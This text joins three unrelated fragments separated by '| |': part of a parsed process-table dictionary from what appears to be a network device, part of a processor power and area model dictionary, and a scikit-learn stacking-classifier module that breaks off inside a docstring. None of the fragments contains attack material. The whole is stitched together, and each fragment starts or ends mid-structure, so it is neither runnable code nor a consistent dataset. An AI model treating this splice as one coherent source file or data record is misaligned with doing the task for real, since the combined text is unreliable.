'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15339': {'five_min': '0%',
'five_sec': '0%',
'name': 'lsmpi-rx',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'154': {'five_min': '0%',
'five_sec': '0%',
'name': 'bdi-default',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'155': {'five_min': '0%',
'five_sec': '0%',
'name': 'kblockd/0',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'156': {'five_min': '0%',
'five_sec': '0%',
'name': 'kblockd/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'157': {'five_min': '0%',
'five_sec': '0%',
'name': 'kacpid',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15791': {'five_min': '0%',
'five_sec': '0%',
'name': 'ddr_err_monitor',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'158': {'five_min': '0%',
'five_sec': '0%',
'name': 'kacpi_notify',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15806': {'five_min': '0%',
'five_sec': '0%',
'name': 'mtdblockd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15828': {'five_min': '0%',
'five_sec': '0%',
'name': 'scansta',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'159': {'five_min': '0%',
'five_sec': '0%',
'name': 'kacpi_hotplug',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'16': {'five_min': '0%',
'five_sec': '0%',
'name': 'desched/0',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'1630': {'five_min': '0%',
'five_sec': '0%',
'name': 'pcscd',
'one_min': '0%',
'ppid': 31695,
'size': 10375168,
'status': 'S'},
'1689': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'17': {'five_min': '0%',
'five_sec': '0%',
'name': 'migration/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'1706': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'1750': {'five_min': '0%',
'five_sec': '0%',
'name': 'pman.sh',
'one_min': '0%',
'ppid': 27708,
'size': 4431872,
'status': 'S'},
'17957': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'1796': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'18': {'five_min': '0%',
'five_sec': '0%',
'name': 'stopper/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'18040': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'18056': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 14898,
'size': 1761280,
'status': 'S'},
'18100': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 14905,
'size': 1761280,
'status': 'S'},
'19': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-high/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'1900': {'five_min': '0%',
'five_sec': '0%',
'name': 'plogd',
'one_min': '0%',
'ppid': 32339,
'size': 20828160,
'status': 'S'},
'2': {'five_min': '0%',
'five_sec': '0%',
'name': 'kthreadd',
'one_min': '0%',
'ppid': 0,
'size': 0,
'status': 'S'},
'20': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-timer/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'21': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-net-tx/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'2160': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'21718': {'five_min': '0%',
'five_sec': '0%',
'name': 'mcp_chvrf.sh',
'one_min': '0%',
'ppid': 1,
'size': 2560000,
'status': 'S'},
'21719': {'five_min': '0%',
'five_sec': '0%',
'name': 'mcp_chvrf.sh',
'one_min': '0%',
'ppid': 1,
'size': 2560000,
'status': 'S'},
'21721': {'five_min': '0%',
'five_sec': '0%',
'name': 'sntp',
'one_min': '0%',
'ppid': 1,
'size': 1867776,
'status': 'S'},
'21722': {'five_min': '0%',
'five_sec': '0%',
'name': 'rollback_timer.',
'one_min': '0%',
'ppid': 1,
'size': 3059712,
'status': 'S'},
'21726': {'five_min': '0%',
'five_sec': '0%',
'name': 'xinetd',
'one_min': '0%',
'ppid': 21718,
'size': 2187264,
'status': 'S'},
'21727': {'five_min': '0%',
'five_sec': '0%',
'name': 'oom.sh',
'one_min': '0%',
'ppid': 1,
'size': 3026944,
'status': 'S'},
'21729': {'five_min': '0%',
'five_sec': '0%',
'name': 'xinetd',
'one_min': '0%',
'ppid': 21719,
'size': 2187264,
'status': 'S'},
'21734': {'five_min': '0%',
'five_sec': '0%',
'name': 'iptbl.sh',
'one_min': '0%',
'ppid': 1,
'size': 3710976,
'status': 'S'},
'21737': {'five_min': '0%',
'five_sec': '0%',
'name': 'libvirtd.sh',
'one_min': '0%',
'ppid': 1,
'size': 2551808,
'status': 'S'},
'21742': {'five_min': '0%',
'five_sec': '0%',
'name': 'libvirtd',
'one_min': '0%',
'ppid': 21737,
'size': 22347776,
'status': 'S'},
'22': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-net-rx/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'22012': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'22049': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 21734,
'size': 1757184,
'status': 'S'},
'22052': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'22054': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'22086': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 21722,
'size': 1757184,
'status': 'S'},
'22097': {'five_min': '0%',
'five_sec': '0%',
'name': 'sleep',
'one_min': '0%',
'ppid': 21727,
'size': 1929216,
'status': 'S'},
'23': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-block/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'23402': {'five_min': '0%',
'five_sec': '0%',
'name': 'chasync.sh',
'one_min': '0%',
'ppid': 1,
'size': 4034560,
'status': 'S'},
'23672': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'23740': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 23402,
'size': 1761280,
'status': 'S'},
'24': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-block-iopo',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'25': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-tasklet/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'26': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-sched/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'2648': {'five_min': '0%',
'five_sec': '0%',
'name': 'rpciod/0',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'2649': {'five_min': '0%',
'five_sec': '0%',
'name': 'rpciod/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'2655': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsiod',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'27': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-hrtimer/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'275': {'five_min': '0%',
'five_sec': '0%',
'name': 'ata/0',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'27578': {'five_min': '0%',
'five_sec': '0%',
'name': 'klogd',
'one_min': '0%',
'ppid': 1,
'size': 1654784,
'status': 'S'},
'276': {'five_min': '0%',
'five_sec': '0%',
'name': 'ata/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'277': {'five_min': '0%',
'five_sec': '0%',
'name': 'ata_aux',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'27708': {'five_min': '0%',
'five_sec': '0%',
'name': 'pvp.sh',
'one_min': '0%',
'ppid': 1,
'size': 4521984,
'status': 'S'},
'27791': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'2794': {'five_min': '4%',
'five_sec': '0%',
'name': 'smand',
'one_min': '4%',
'ppid': 1269,
'size': 154185728,
'status': 'S'},
'28': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-rcu/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'28080': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 27708,
'size': 1761280,
'status': 'S'},
'281': {'five_min': '0%',
'five_sec': '0%',
'name': 'khubd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'28156': {'five_min': '0%',
'five_sec': '0%',
'name': 'pman.sh',
'one_min': '0%',
'ppid': 27708,
'size': 4427776,
'status': 'S'},
'28264': {'five_min': '0%',
'five_sec': '0%',
'name': 'pman.sh',
'one_min': '0%',
'ppid': 27708,
'size': 4407296,
'status': 'S'},
'2833': {'five_min': '0%',
'five_sec': '0%',
'name': 'psd',
'one_min': '0%',
'ppid': 824,
'size': 20340736,
'status': 'S'},
'28362': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'284': {'five_min': '0%',
'five_sec': '0%',
'name': 'kseriod',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'28464': {'five_min': '0%',
'five_sec': '0%',
'name': 'pman.sh',
'one_min': '0%',
'ppid': 27708,
'size': 4407296,
'status': 'S'},
'28562': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'28801': {'five_min': '0%',
| |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0543263,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.245359,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.255278,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.586053,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.01483,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.582035,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.18292,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.540152,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.43388,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0482275,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0212449,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.175515,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.157119,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.223743,
'Execution Unit/Register Files/Runtime Dynamic': 0.178364,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.439,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.26296,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 4.27498,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00251342,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00251342,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00218375,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000842395,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00225703,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00946762,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0242926,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.151043,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.418377,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.513008,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.11619,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0343782,
'L2/Runtime Dynamic': 0.0108983,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.75935,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.671,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.178657,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.178657,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.60645,
'Load Store Unit/Runtime Dynamic': 3.73073,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.440539,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.881077,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.156349,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.156777,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0688451,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.82879,
'Memory Management Unit/Runtime Dynamic': 0.225623,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 28.4339,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.168255,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0319922,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.31027,
'Renaming Unit/Int Front End RAT/Subthreshold | |
import pandas as pd
import numpy as np
from copy import deepcopy
import warnings
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import cross_val_predict
from sklearn.model_selection import KFold, StratifiedKFold
from sklearn.externals.joblib import Parallel, delayed
from gravity_learn.utils import (force_array,
check_cv,
fit_model,
check_is_fitted)
__all__ = ['EnsemblerClassifier',
'QuickStackClassifier',
'FullStackClassifier']
class EnsemblerClassifier(BaseEstimator, TransformerMixin):
    # TODO: require df? how to pass Yfactory in
    """
    Ensemble a set of given, already-tuned base models.

    The fit method:
        For each base model, two things happen:
          - out-of-sample predictions are produced via cross_val_predict
            (n_folds fit/predict rounds); these become the training
            features for the ensembler.
          - the base model is refitted on the full data; these fitted
            models feed the ensembler's predict_proba method.
        So each base model is fitted n_folds + 1 times in total.

    The predict_proba method:
        Collects the P(class=1) predictions of each fitted base model
        and combines them with the fitted ensembler.

    Deprecated: use FullStackClassifier instead.
    """

    def __init__(self, base_models, ensembler_est, n_folds, random_state=0):
        """
        Parameters
        ----------
        base_models : dict
            Mapping of model name -> estimator (assumed already tuned).
        ensembler_est : estimator
            Combines the out-of-fold outputs of the base models.
        n_folds : int
            Number of folds used to produce the out-of-fold predictions.
            Ideally high, because it makes the size of the base model fit
            for predictions and the base model fit for ensembler
            calibration more similar.
        random_state : int
            Random state for the StratifiedKFold shuffling.
        """
        self.base_models = base_models
        self.ensembler_est = ensembler_est
        self.n_folds = n_folds
        self.random_state = random_state
        self.fitted_base_models = {}
        self.model_order = []
        warnings.warn('EnsemblerClassifier is deprecated, '
                      'please use FullStackClassifier instead',
                      DeprecationWarning)

    def fit(self, X, y):
        """Fit the base models and calibrate the ensembler.

        X must be a pandas DataFrame (X.index is used to align the
        out-of-fold predictions).
        """
        # Reset fitted state so a second call to fit() does not append
        # duplicate names to model_order (which would duplicate columns
        # in the ensembler's training frame and corrupt its input).
        self.fitted_base_models = {}
        self.model_order = []
        cv = StratifiedKFold(
            n_splits=self.n_folds,
            shuffle=True,
            random_state=self.random_state
        )
        base_predictions = {}
        for name, model in self.base_models.items():
            # Out-of-fold P(class=1): this is the training data for
            # determining the ensembler parameters
            base_predictions[name] = cross_val_predict(
                model, X, y, cv=cv, method='predict_proba'
            )[:, 1]
            # Full-data fit: used by the ensembler's predict method
            self.fitted_base_models[name] = model.fit(X, y)
            self.model_order.append(name)
        # Fix the column order so that fit and predict agree
        base_predictions = pd.DataFrame(
            base_predictions,
            index=X.index
        )[self.model_order]
        self.ensembler_est.fit(base_predictions, y)
        return self

    def predict_proba(self, X):
        """Predict class probabilities by combining base model outputs."""
        base_predictions = {}
        for name, model in self.fitted_base_models.items():
            base_predictions[name] = model.predict_proba(X)[:, 1]
        # Same column order as during fit
        base_predictions = pd.DataFrame(
            base_predictions,
            index=X.index
        )[self.model_order]
        return self.ensembler_est.predict_proba(base_predictions)
class QuickStackClassifier(BaseEstimator):
    """
    Stacking classifier that trades some calibration data for speed.

    Instead of doing K-fold training for each base model (K fits per
    model), each base model is trained once on the training part of the
    *last* CV fold; its predictions on the held-out part of that fold
    are the training data for the ensembler. To have a good performance,
    it requires the ensembler to be a simple model with only a few
    parameters to tune.

    Parameters
    ----------
    base_models : list of (string, base_model) tuples. The first
        half of each tuple is the group name of the pipeline.
    ensembler : an ensembler to combine the outputs of the base models
    proba : bool, if True, model will implement predict_proba when it
        gets called; if False, base model outputs are converted to hard
        0/1 predictions (threshold 0.5) before being fed to the ensembler
    full_train : bool, if True, its base models are trained with 100% data
        again and they are used for generating probas for new data
        Default is True
    cv : int, cross-validation generator or an iterable, optional
        Determines the cross-validation splitting strategy.
        Possible inputs for cv are:
        - None, to use the default 3-fold cross validation,
        - integer, to specify the number of folds in a `(Stratified)KFold`,
        - An object to be used as a cross-validation generator.
        - An iterable yielding train, test splits.
    n_jobs : integer, optional
        The number of CPUs to use to do the computation. -1 means
        'all CPUs'.
    verbose : integer, optional
        The verbosity level.

